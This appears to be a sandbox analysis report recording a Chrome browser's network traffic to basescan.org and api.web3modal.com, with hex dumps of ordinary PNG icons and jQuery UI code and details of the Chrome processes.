                                                                                                                                                                                                                                              Cf-Polished: origSize=457
                                                                                                                                                                                                                                              ETag: "80cda0c54ee5d91:0"
                                                                                                                                                                                                                                              Last-Modified: Tue, 12 Sep 2023 07:57:27 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 123033
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZaKSGZ3%2Be%2BtQcv5P6BNIzlxQ7RLJy%2FU7LiKLFFqS31d21759TgVfT3ZjyP7iCLbKGTPrB51TxCC1AD6B1ogFuKxjIsPjWd%2BdAISwDzY8X%2FeHATbYrdV%2Fq5aBKkARnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2f10b314204-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC331INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 14 08 06 00 00 00 8d 89 1d 0d 00 00 01 12 49 44 41 54 78 da ad d4 b1 4b 02 61 18 c7 f1 f7 9a 53 b0 23 87 88 f6 a6 a4 a9 a1 b9 fe 82 82 8a 48 28 6a 08 da da 6b 6f 8f 96 26 83 a6 66 a3 21 82 86 92 68 11 9c 44 17 11 c5 c9 45 d1 c1 c7 ef f0 0a f2 70 e7 eb dd 79 f0 59 ee fd f1 bd e5 ee cc e4 12 63 36 71 87 6b f8 26 e9 45 24 0f b1 1a f0 17 16 b4 6e 16 1d 7c 80 87 23 fc e2 07 07 49 82 45 7c 43 94 2f e4 a2 05 dd 46 78 42 36 4e b0 8f 77 bc e0 4f 9d 75 71 11 25 f8 8c 8c da 6d a3 a2 76 39 77 90 58 c8 83 d7 51 57 db 53 57 b0 87 0c 52 f8 c0 de 54 ac 0a 51 f2 ae 60 d1 de 4b e3 13 fb 58 45 19 12 27 58 08 38 bf 85 c4 0d 96 02 ce 3d 3c c6 0d 8e b0 e5 88 3a 83 27 6a 54 c6 4a 48 f4 4d 6d 0f 83 82 59 74 d4
                                                                                                                                                                                                                                              Data Ascii: PNGIHDRIDATxKaS#H(jko&f!hDEpyYc6qk&E$n|#IE|C/FxB6NwOuq%mv9wXQWSWRTQ`KXE'X8=<:'jTJHMmYt


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              147192.168.2.549898104.26.12.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC361OUTGET /images/gen/bcgame_20a.png HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC853INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                              Content-Length: 332
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                                              Cf-Polished: origSize=487
                                                                                                                                                                                                                                              ETag: "80cda0c54ee5d91:0"
                                                                                                                                                                                                                                              Last-Modified: Tue, 12 Sep 2023 07:57:27 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 123033
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=StivvTQzgq%2FMjy1Iv5%2Bu%2BduJoiWeq6%2BXEBAPMzd7bbOrsOUiGQQCwujHMKyq%2Bta4g0G%2FS0Z9vNFHjee2owbLxzbP71QwoUbx%2BkFg9mAjlL1K9Rfq9ZAzawa51eL7Rg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2f12d19c434-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC332INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 14 08 06 00 00 00 8d 89 1d 0d 00 00 01 13 49 44 41 54 78 da ad d4 b1 4b 02 61 1c 87 f1 bb e6 14 ec c8 21 a2 bd 29 69 6a 68 ae bf a0 a0 22 12 8a 1a 82 b6 f6 da db a3 a5 49 c1 c9 59 71 10 c1 41 45 5c 04 07 11 5d 44 14 27 17 45 07 5f 9f e1 90 e3 c7 9d af 77 e7 c1 67 b9 f7 cb 73 cb dd 19 eb ab 6d 9c e2 0b ef b0 8c b0 17 91 24 94 ad 0f 6b 77 41 e0 63 d7 c1 1f 98 b8 43 15 15 dc 84 09 e6 50 86 12 4a 48 f8 0b ea 2d f1 87 78 90 e0 0c 79 a4 51 17 67 13 bc f8 09 fe 23 26 76 e7 68 89 5d 42 1f 24 e6 f1 e0 63 f4 c4 f6 51 17 9c 22 86 08 0a b8 72 c4 3a 50 42 52 17 cc d9 f7 a2 28 e2 1a 87 68 42 05 09 a6 5c ce 3f a1 82 06 6b 2e e7 26 7e 83 06 97 38 d3 44 b5 c1 07 31 6a e2 c0 23 9a 15 db 5b b7 60 1c 63 31
                                                                                                                                                                                                                                              Data Ascii: PNGIHDRIDATxKa!)ijh"IYqAE\]D'E_wgsm$kwAcCPJH-xyQg#&vh]B$cQ"r:PBR(hB\?k.&~8D1j#[`c1


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              148192.168.2.549896104.18.29.724435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC368OUTGET /getWallets?page=1&entries=4 HTTP/1.1
                                                                                                                                                                                                                                              Host: api.web3modal.com
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC314INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                              Content-Length: 9
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                              Cache-Control: public, max-age=300, s-maxage=300
                                                                                                                                                                                                                                              access-control-allow-credentials: true
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2f11c020cb4-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC9INData Raw: 46 6f 72 62 69 64 64 65 6e
                                                                                                                                                                                                                                              Data Ascii: Forbidden


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              149192.168.2.549900104.26.12.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC387OUTGET /assets/vendor/jquery-ui/jquery-ui.min.js?v=24.4.4.9 HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC815INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:09 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Last-Modified: Sun, 13 Jan 2019 06:59:00 GMT
                                                                                                                                                                                                                                              ETag: W/"0d2ce75dabd41:0"
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 351147
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2FeeO1s4ZeyJ0ASQ8Gwt3ijHQRbp3XPfMbfSF0ODgonJ%2BjBmOUZwT%2BC51Du1SInNdYJHQiYILFzJLQAsbSkkNMKbrj61k7oHvwFeBp2Kf%2FOsF2kWwrpkSVEmNsBdMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2f13bd7de99-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC554INData Raw: 37 63 37 32 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 55 49 20 2d 20 76 31 2e 31 32 2e 31 20 2d 20 32 30 31 36 2d 30 39 2d 31 34 0d 0a 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0d 0a 2a 20 49 6e 63 6c 75 64 65 73 3a 20 77 69 64 67 65 74 2e 6a 73 2c 20 70 6f 73 69 74 69 6f 6e 2e 6a 73 2c 20 64 61 74 61 2e 6a 73 2c 20 64 69 73 61 62 6c 65 2d 73 65 6c 65 63 74 69 6f 6e 2e 6a 73 2c 20 65 66 66 65 63 74 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6c 69 6e 64 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 62 6f 75 6e 63 65 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 63 6c 69 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66 65 63 74 2d 64 72 6f 70 2e 6a 73 2c 20 65 66 66 65 63 74 73 2f 65 66 66
                                                                                                                                                                                                                                              Data Ascii: 7c72/*! jQuery UI - v1.12.1 - 2016-09-14* http://jqueryui.com* Includes: widget.js, position.js, data.js, disable-selection.js, effect.js, effects/effect-blind.js, effects/effect-bounce.js, effects/effect-clip.js, effects/effect-drop.js, effects/eff
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 69 6e 2e 6a 73 2c 20 6a 71 75 65 72 79 2d 31 2d 37 2e 6a 73 2c 20 6b 65 79 63 6f 64 65 2e 6a 73 2c 20 6c 61 62 65 6c 73 2e 6a 73 2c 20 73 63 72 6f 6c 6c 2d 70 61 72 65 6e 74 2e 6a 73 2c 20 74 61 62 62 61 62 6c 65 2e 6a 73 2c 20 75 6e 69 71 75 65 2d 69 64 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 61 63 63 6f 72 64 69 6f 6e 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 62 75 74 74 6f 6e 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 63 68 65 63 6b 62 6f 78 72 61 64 69 6f 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 63 6f 6e 74 72 6f 6c 67 72 6f 75 70 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 64 61 74 65 70 69 63 6b 65 72 2e 6a 73 2c 20 77 69 64 67 65 74 73 2f 64 69 61 6c 6f 67 2e 6a 73 2c 20 77 69 64 67 65 74
                                                                                                                                                                                                                                              Data Ascii: in.js, jquery-1-7.js, keycode.js, labels.js, scroll-parent.js, tabbable.js, unique-id.js, widgets/accordion.js, widgets/autocomplete.js, widgets/button.js, widgets/checkboxradio.js, widgets/controlgroup.js, widgets/datepicker.js, widgets/dialog.js, widget
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 74 68 69 73 2e 5f 75 6e 73 65 6c 65 63 74 61 62 6c 65 43 6c 61 73 73 3d 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 75 6e 73 65 6c 65 63 74 61 62 6c 65 22 2c 74 68 69 73 2e 5f 63 75 72 72 65 6e 74 43 6c 61 73 73 3d 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 63 75 72 72 65 6e 74 2d 64 61 79 22 2c 74 68 69 73 2e 5f 64 61 79 4f 76 65 72 43 6c 61 73 73 3d 22 75 69 2d 64 61 74 65 70 69 63 6b 65 72 2d 64 61 79 73 2d 63 65 6c 6c 2d 6f 76 65 72 22 2c 74 68 69 73 2e 72 65 67 69 6f 6e 61 6c 3d 5b 5d 2c 74 68 69 73 2e 72 65 67 69 6f 6e 61 6c 5b 22 22 5d 3d 7b 63 6c 6f 73 65 54 65 78 74 3a 22 44 6f 6e 65 22 2c 70 72 65 76 54 65 78 74 3a 22 50 72 65 76 22 2c 6e 65 78 74 54 65 78 74 3a 22 4e 65 78 74 22 2c 63 75 72 72 65 6e 74 54 65 78 74 3a 22 54 6f 64 61 79 22 2c
                                                                                                                                                                                                                                              Data Ascii: this._unselectableClass="ui-datepicker-unselectable",this._currentClass="ui-datepicker-current-day",this._dayOverClass="ui-datepicker-days-cell-over",this.regional=[],this.regional[""]={closeText:"Done",prevText:"Prev",nextText:"Next",currentText:"Today",
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 2c 61 75 74 6f 53 69 7a 65 3a 21 31 2c 64 69 73 61 62 6c 65 64 3a 21 31 7d 2c 74 2e 65 78 74 65 6e 64 28 74 68 69 73 2e 5f 64 65 66 61 75 6c 74 73 2c 74 68 69 73 2e 72 65 67 69 6f 6e 61 6c 5b 22 22 5d 29 2c 74 68 69 73 2e 72 65 67 69 6f 6e 61 6c 2e 65 6e 3d 74 2e 65 78 74 65 6e 64 28 21 30 2c 7b 7d 2c 74 68 69 73 2e 72 65 67 69 6f 6e 61 6c 5b 22 22 5d 29 2c 74 68 69 73 2e 72 65 67 69 6f 6e 61 6c 5b 22 65 6e 2d 55 53 22 5d 3d 74 2e 65 78 74 65 6e 64 28 21 30 2c 7b 7d 2c 74 68 69 73 2e 72 65 67 69 6f 6e 61 6c 2e 65 6e 29 2c 74 68 69 73 2e 64 70 44 69 76 3d 6e 28 74 28 22 3c 64 69 76 20 69 64 3d 27 22 2b 74 68 69 73 2e 5f 6d 61 69 6e 44 69 76 49 64 2b 22 27 20 63 6c 61 73 73 3d 27 75 69 2d 64 61 74 65 70 69 63 6b 65 72 20 75 69 2d 77 69 64 67 65 74 20 75 69
                                                                                                                                                                                                                                              Data Ascii: ,autoSize:!1,disabled:!1},t.extend(this._defaults,this.regional[""]),this.regional.en=t.extend(!0,{},this.regional[""]),this.regional["en-US"]=t.extend(!0,{},this.regional.en),this.dpDiv=n(t("<div id='"+this._mainDivId+"' class='ui-datepicker ui-widget ui
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 31 22 3b 76 61 72 20 68 3d 30 2c 6c 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 3b 74 2e 63 6c 65 61 6e 44 61 74 61 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 73 2c 6e 2c 6f 3b 66 6f 72 28 6f 3d 30 3b 6e 75 6c 6c 21 3d 28 6e 3d 69 5b 6f 5d 29 3b 6f 2b 2b 29 74 72 79 7b 73 3d 74 2e 5f 64 61 74 61 28 6e 2c 22 65 76 65 6e 74 73 22 29 2c 73 26 26 73 2e 72 65 6d 6f 76 65 26 26 74 28 6e 29 2e 74 72 69 67 67 65 72 48 61 6e 64 6c 65 72 28 22 72 65 6d 6f 76 65 22 29 7d 63 61 74 63 68 28 61 29 7b 7d 65 28 69 29 7d 7d 28 74 2e 63 6c 65 61 6e 44 61 74 61 29 2c 74 2e 77 69 64 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 69 2c 73 29 7b 76 61 72 20 6e 2c 6f 2c 61 2c 72 3d 7b 7d 2c 68
                                                                                                                                                                                                                                              Data Ascii: 1";var h=0,l=Array.prototype.slice;t.cleanData=function(e){return function(i){var s,n,o;for(o=0;null!=(n=i[o]);o++)try{s=t._data(n,"events"),s&&s.remove&&t(n).triggerHandler("remove")}catch(a){}e(i)}}(t.cleanData),t.widget=function(e,i,s){var n,o,a,r={},h
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 73 2e 70 75 73 68 28 6f 29 2c 74 2e 77 69 64 67 65 74 2e 62 72 69 64 67 65 28 65 2c 6f 29 2c 6f 7d 2c 74 2e 77 69 64 67 65 74 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 69 2c 73 2c 6e 3d 6c 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 2c 6f 3d 30 2c 61 3d 6e 2e 6c 65 6e 67 74 68 3b 61 3e 6f 3b 6f 2b 2b 29 66 6f 72 28 69 20 69 6e 20 6e 5b 6f 5d 29 73 3d 6e 5b 6f 5d 5b 69 5d 2c 6e 5b 6f 5d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 69 29 26 26 76 6f 69 64 20 30 21 3d 3d 73 26 26 28 65 5b 69 5d 3d 74 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 73 29 3f 74 2e 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 28 65 5b 69 5d 29 3f 74 2e 77 69 64 67 65 74 2e 65 78 74 65 6e 64 28 7b 7d 2c 65 5b 69 5d 2c 73 29 3a 74 2e
                                                                                                                                                                                                                                              Data Ascii: s.push(o),t.widget.bridge(e,o),o},t.widget.extend=function(e){for(var i,s,n=l.call(arguments,1),o=0,a=n.length;a>o;o++)for(i in n[o])s=n[o][i],n[o].hasOwnProperty(i)&&void 0!==s&&(e[i]=t.isPlainObject(s)?t.isPlainObject(e[i])?t.widget.extend({},e[i],s):t.
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 61 62 6c 65 3d 74 28 29 2c 74 68 69 73 2e 66 6f 63 75 73 61 62 6c 65 3d 74 28 29 2c 74 68 69 73 2e 63 6c 61 73 73 65 73 45 6c 65 6d 65 6e 74 4c 6f 6f 6b 75 70 3d 7b 7d 2c 69 21 3d 3d 74 68 69 73 26 26 28 74 2e 64 61 74 61 28 69 2c 74 68 69 73 2e 77 69 64 67 65 74 46 75 6c 6c 4e 61 6d 65 2c 74 68 69 73 29 2c 74 68 69 73 2e 5f 6f 6e 28 21 30 2c 74 68 69 73 2e 65 6c 65 6d 65 6e 74 2c 7b 72 65 6d 6f 76 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 74 61 72 67 65 74 3d 3d 3d 69 26 26 74 68 69 73 2e 64 65 73 74 72 6f 79 28 29 7d 7d 29 2c 74 68 69 73 2e 64 6f 63 75 6d 65 6e 74 3d 74 28 69 2e 73 74 79 6c 65 3f 69 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3a 69 2e 64 6f 63 75 6d 65 6e 74 7c 7c 69 29 2c 74 68 69 73 2e 77 69 6e 64 6f 77 3d 74 28 74 68 69 73 2e 64
                                                                                                                                                                                                                                              Data Ascii: able=t(),this.focusable=t(),this.classesElementLookup={},i!==this&&(t.data(i,this.widgetFullName,this),this._on(!0,this.element,{remove:function(t){t.target===i&&this.destroy()}}),this.document=t(i.style?i.ownerDocument:i.document||i),this.window=t(this.d
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 69 6f 6e 73 5b 65 5d 3f 6e 75 6c 6c 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 5b 65 5d 3b 61 5b 65 5d 3d 69 7d 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 73 65 74 4f 70 74 69 6f 6e 73 28 61 29 2c 74 68 69 73 7d 2c 5f 73 65 74 4f 70 74 69 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3b 66 6f 72 28 65 20 69 6e 20 74 29 74 68 69 73 2e 5f 73 65 74 4f 70 74 69 6f 6e 28 65 2c 74 5b 65 5d 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 2c 5f 73 65 74 4f 70 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 22 63 6c 61 73 73 65 73 22 3d 3d 3d 74 26 26 74 68 69 73 2e 5f 73 65 74 4f 70 74 69 6f 6e 43 6c 61 73 73 65 73 28 65 29 2c 74 68 69 73 2e 6f 70 74 69 6f 6e 73 5b 74 5d 3d 65 2c 22 64 69 73 61 62 6c 65 64 22 3d 3d 3d 74 26 26 74 68
                                                                                                                                                                                                                                              Data Ascii: ions[e]?null:this.options[e];a[e]=i}return this._setOptions(a),this},_setOptions:function(t){var e;for(e in t)this._setOption(e,t[e]);return this},_setOption:function(t,e){return"classes"===t&&this._setOptionClasses(e),this.options[t]=e,"disabled"===t&&th
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 63 6b 43 6c 61 73 73 65 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 69 3d 74 68 69 73 3b 74 2e 65 61 63 68 28 69 2e 63 6c 61 73 73 65 73 45 6c 65 6d 65 6e 74 4c 6f 6f 6b 75 70 2c 66 75 6e 63 74 69 6f 6e 28 73 2c 6e 29 7b 2d 31 21 3d 3d 74 2e 69 6e 41 72 72 61 79 28 65 2e 74 61 72 67 65 74 2c 6e 29 26 26 28 69 2e 63 6c 61 73 73 65 73 45 6c 65 6d 65 6e 74 4c 6f 6f 6b 75 70 5b 73 5d 3d 74 28 6e 2e 6e 6f 74 28 65 2e 74 61 72 67 65 74 29 2e 67 65 74 28 29 29 29 7d 29 7d 2c 5f 72 65 6d 6f 76 65 43 6c 61 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 74 6f 67 67 6c 65 43 6c 61 73 73 28 74 2c 65 2c 69 2c 21 31 29 7d 2c 5f 61 64 64 43 6c 61 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65
                                                                                                                                                                                                                                              Data Ascii: ckClassesElement:function(e){var i=this;t.each(i.classesElementLookup,function(s,n){-1!==t.inArray(e.target,n)&&(i.classesElementLookup[s]=t(n.not(e.target).get()))})},_removeClass:function(t,e,i){return this._toggleClass(t,e,i,!1)},_addClass:function(t,e
                                                                                                                                                                                                                                              2024-09-28 01:16:09 UTC1369INData Raw: 68 6f 76 65 72 61 62 6c 65 3d 74 68 69 73 2e 68 6f 76 65 72 61 62 6c 65 2e 61 64 64 28 65 29 2c 74 68 69 73 2e 5f 6f 6e 28 65 2c 7b 6d 6f 75 73 65 65 6e 74 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 5f 61 64 64 43 6c 61 73 73 28 74 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2c 6e 75 6c 6c 2c 22 75 69 2d 73 74 61 74 65 2d 68 6f 76 65 72 22 29 7d 2c 6d 6f 75 73 65 6c 65 61 76 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 5f 72 65 6d 6f 76 65 43 6c 61 73 73 28 74 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2c 6e 75 6c 6c 2c 22 75 69 2d 73 74 61 74 65 2d 68 6f 76 65 72 22 29 7d 7d 29 7d 2c 5f 66 6f 63 75 73 61 62 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 66 6f 63 75 73 61 62 6c 65 3d 74 68 69 73 2e
                                                                                                                                                                                                                                              Data Ascii: hoverable=this.hoverable.add(e),this._on(e,{mouseenter:function(e){this._addClass(t(e.currentTarget),null,"ui-state-hover")},mouseleave:function(e){this._removeClass(t(e.currentTarget),null,"ui-state-hover")}})},_focusable:function(e){this.focusable=this.


                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                              Start time:21:15:45
                                                                                                                                                                                                                                              Start date:27/09/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                              Imagebase:0x7ff715980000
                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                              Start time:21:15:49
                                                                                                                                                                                                                                              Start date:27/09/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 --field-trial-handle=2240,i,4231358711642058610,15101609295661617124,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                              Imagebase:0x7ff715980000
                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                              Start time:21:15:51
                                                                                                                                                                                                                                              Start date:27/09/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
